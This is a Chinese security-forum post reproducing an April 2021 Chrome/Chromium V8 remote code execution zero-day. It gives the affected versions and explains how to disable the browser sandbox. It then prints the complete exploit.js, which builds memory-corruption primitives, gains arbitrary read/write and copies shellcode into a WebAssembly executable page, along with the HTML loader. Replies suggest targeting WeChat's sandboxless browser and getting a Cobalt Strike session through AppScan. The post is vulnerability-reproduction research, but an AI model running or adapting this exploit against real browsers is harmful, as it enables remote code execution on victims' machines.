【限时活动】-2021.04.13 Google Chrome远程代码执行0Day漏洞复现

gjmvp   ·   发表于 2021-04-21 12:02:03   ·   技术文章投稿区

0x00 前言

前几天听说了这个漏洞一直没有机会复现,今天决定复现一下,参考了几篇文章之后自己就开始动手进行了复现

0x01 漏洞概述

  • 2021年04月13日,360CERT监测发现国外安全研究员发布了Chrome 远程代码执行 0Day的POC详情,
    漏洞等级:严重
    漏洞评分:9.8
  • Chrome是四大浏览器内核之一,统称为Chromium内核或Chrome内核。chrome是开放源代码的,目前采用Chrome内核的浏览器有著名的Google Chrome、360极速、搜狗、新版opera、yandex还有微软旗下Microsoft Edge等,总之,chrome内核在浏览器份额中,占比非常大
  • 漏洞会影响当前版本的Google Chrome,Microsoft Edge和其他可能基于Chromium的浏览器。不过需要关闭浏览器的沙盒,也就是说,chrome的沙盒可以拦截该远程代码执行漏洞,并且目前Google chrome最新版本 90.0.4430.72已经被修复

0x02漏洞条件

漏洞所需环境条件如下:

  • 浏览器版本<= 89.0.4389.114
  • 此漏洞无法逃逸沙箱,需要关闭浏览器的沙箱(SandBox)功能【此功能默认开启】

关闭沙箱方法:
  1.在谷歌浏览器快捷方式右键点击属性,然后点击快捷方式,在目标的后面添加上
--no-sandbox


  2.然后点击应用,确定
  3.打开浏览器看到提示,即成功关闭sandbox

0x03漏洞验证

漏洞POC:
https://github.com/r4j0x00/exploits/tree/master/chrome-0day

这个脚本的作用是打开Windows10的计算器

exploit.js

  1. /*
  2. BSD 2-Clause License
  3. Copyright (c) 2021, rajvardhan agarwal
  4. All rights reserved.
  5. Redistribution and use in source and binary forms, with or without
  6. modification, are permitted provided that the following conditions are met:
  7. 3. Redistributions of source code must retain the above copyright notice, this
  8. list of conditions and the following disclaimer.
  9. 4. Redistributions in binary form must reproduce the above copyright notice,
  10. this list of conditions and the following disclaimer in the documentation
  11. and/or other materials provided with the distribution.
  12. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
  13. AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  14. IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  15. DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
  16. FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  17. DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  18. SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
  19. CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
  20. OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
  21. OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  22. */
  23. var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
  24. var wasm_mod = new WebAssembly.Module(wasm_code);
  25. var wasm_instance = new WebAssembly.Instance(wasm_mod);
  26. var f = wasm_instance.exports.main;
  27. var buf = new ArrayBuffer(8);
  28. var f64_buf = new Float64Array(buf);
  29. var u64_buf = new Uint32Array(buf);
  30. let buf2 = new ArrayBuffer(0x150);
  31. function ftoi(val) {
  32. f64_buf[0] = val;
  33. return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
  34. }
  35. function itof(val) {
  36. u64_buf[0] = Number(val & 0xffffffffn);
  37. u64_buf[1] = Number(val >> 32n);
  38. return f64_buf[0];
  39. }
  40. const _arr = new Uint32Array([2**31]);
  41. function foo(a) {
  42. var x = 1;
  43. x = (_arr[0] ^ 0) + 1;
  44. x = Math.abs(x);
  45. x -= 2147483647;
  46. x = Math.max(x, 0);
  47. x -= 1;
  48. if(x==-1) x = 0;
  49. var arr = new Array(x);
  50. arr.shift();
  51. var cor = [1.1, 1.2, 1.3];
  52. return [arr, cor];
  53. }
  54. for(var i=0;i<0x3000;++i)
  55. foo(true);
  56. var x = foo(false);
  57. var arr = x[0];
  58. var cor = x[1];
  59. const idx = 6;
  60. arr[idx+10] = 0x4242;
  61. function addrof(k) {
  62. arr[idx+1] = k;
  63. return ftoi(cor[0]) & 0xffffffffn;
  64. }
  65. function fakeobj(k) {
  66. cor[0] = itof(k);
  67. return arr[idx+1];
  68. }
  69. var float_array_map = ftoi(cor[3]);
  70. var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
  71. var fake = fakeobj(addrof(arr2) + 0x20n);
  72. function arbread(addr) {
  73. if (addr % 2n == 0) {
  74. addr += 1n;
  75. }
  76. arr2[1] = itof((2n << 32n) + addr - 8n);
  77. return (fake[0]);
  78. }
  79. function arbwrite(addr, val) {
  80. if (addr % 2n == 0) {
  81. addr += 1n;
  82. }
  83. arr2[1] = itof((2n << 32n) + addr - 8n);
  84. fake[0] = itof(BigInt(val));
  85. }
  86. function copy_shellcode(addr, shellcode) {
  87. let dataview = new DataView(buf2);
  88. let buf_addr = addrof(buf2);
  89. let backing_store_addr = buf_addr + 0x14n;
  90. arbwrite(backing_store_addr, addr);
  91. for (let i = 0; i < shellcode.length; i++) {
  92. dataview.setUint32(4*i, shellcode[i], true);
  93. }
  94. }
  95. var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
  96. console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
  97. var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
  98. copy_shellcode(rwx_page_addr, shellcode);
  99. f();

exploit.html

  1. <script src="exploit.js"></script>

然后我们在本地双击打开构建的POC测试脚本,就可以发现成功的弹出了计算器


0x04总结

由于Google Chrome 浏览器的沙箱机制是默认开启的,也就是说,正常使用浏览器,是不会存在问题的。

而且我自己在复现的过程中,发现这个漏洞并没有那么容易复现,在测试很多次之后才复现成功,个人感觉在实际利用过程中还是比较困难的。

用户名金币积分时间理由
Track-聂风 40.00 0 2021-04-21 16:04:08 限时活动
Track-聂风 90.00 0 2021-04-21 16:04:58 同学加油~期待更好的文章

打赏我,让我更有动力~

2 Reply   |  Until 2021-4-22 | 574 View

Track-聂风
发表于 2021-4-21

微信的浏览器使用的是谷歌浏览器内核,默认沙箱关闭。新版本就这几天被修复的

评论列表

  • 加载数据中...

编写评论内容

xiaoc
发表于 2021-4-22

Appscan也是用的chrome且“ —no-sandbox ”然后,

只要扫描到exp.html也能上线cs,

类似的案例很多。

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.